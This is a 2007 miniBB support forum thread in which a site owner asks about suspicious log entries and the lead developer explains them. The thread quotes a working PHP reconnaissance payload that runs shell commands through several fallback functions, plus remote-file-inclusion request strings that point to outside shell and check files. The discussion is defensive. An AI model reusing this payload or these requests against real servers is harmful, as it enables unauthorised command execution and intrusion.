miniBB ® miniBB®
miniBB Support Forums
 | Forums | Register | Reply | Search | Statistics | Manual |
The Other miniBB Support Forums / The Other /   

Suspicious HTTP requests from the log files

Author kolia
Registered
#1 | Posted: 27 Sep 2007 05:58 
Hi guys! I am using minibb for a year now, recently started to notice some weird traffic from xxx content sites. I checked the referrers of the link, and there was one strange bit of php, that i am not strong to understand, maybe somebody knows what can it be?


$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){

$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);

}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);

$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;

}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;

Author Paul
Lead Developer
#2 | Posted: 27 Sep 2007 11:38 
Hmm, I nearly understand what this code is about, but I don't understand where you've got it from. XXX Traffic? This data can not be executed in referrers I suppose...

Author kolia
Registered
#3 | Posted: 28 Sep 2007 03:05 
Hi Paul, thank you for the reply, in my traffic stats i get this:

Host: 80.172.224.21
/forum/eng.php?img=http://usuarios.arnet.com.ar/larry123/safe.txt?
Http Code: 404 Date: Sep 28 04:34:49 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.808

if you remove the ? mark at the end of safe.txt you will get what i posted before.
I don't want to know exactly what it does, i just want to know if I should worry about something or not? is my forum under attack or it was hacked:)

Spasibo anyway, i know it's probably not your business, just thought it would be interesting.

Author kolia
Registered
#4 | Posted: 28 Sep 2007 03:19 
ah ok i found some info about it http://www.ossec.net/wiki/index.php/WebAttacks_links#Sites_with_PHP.2FPerl_scripts

Author Paul
Lead Developer
#5 | Posted: 28 Sep 2007 04:41 | Edited by: Paul 
Well, I could say only miniBB traffic is full of such stuff and even more :-)

For example from our logs (minibbtest):

/http://indir.savsak.com/shell.txt

minibb-test.php+[plm=0]+get+http://
minibb.org/minibb-test.php+[0,33753,33538]+->+[n]+post+http://minibb.org/minibb-test.php

/testhttp://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt

The hackers will send such requests always, and there is nothing dangerous until you have safe up-to-date version of PHP, probably mySQL and the latest release of miniBB of course.

The code you are reffering in that case will try to execute on the malicious server and provide some info about this server to the hacker, like disk space available and system information. I suppose this code does nothing dangerous and just checks. It works probably only if there's some hole in PHP root code which has been discovered in the past.

You could check your system for the basic security executing _install.php file which comes by default in miniBB package, with the 'analysis' parameter, i.e.

_install.php?analysis

It should give information regarding PHP version, register_globals, safe_mode and vulnerable folder. These are the basic things to know to be protected.

I think having just what you see in your logs is not reason of worrying. But if you see some strange unknown files under your forums folder which do not come by default with miniBB, it is worth to investigate where they come from.

Author kolia
Registered
#6 | Posted: 28 Sep 2007 04:52 
Thank you very much Paul!
Spasibo Bolshoye:)

The Other miniBB Support Forums / The Other / Suspicious HTTP requests from the log files Top

Your Reply Click this icon to move up to the quoted message

 Short link for this topic:

 ?
Only registered users are allowed to post here. Please, enter your username/password details upon posting a message, or register first.


Before posting, make sure your message is compliant with our forum posting rules. If not, it may be locked or deleted with no explanation.
 
miniBB Support Forums Powered by Forum Software miniBB ® Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contacts
Proceed with the Captcha add-on: protect your miniBB-forums from the automated spam and flood.
Captcha Addon for miniBB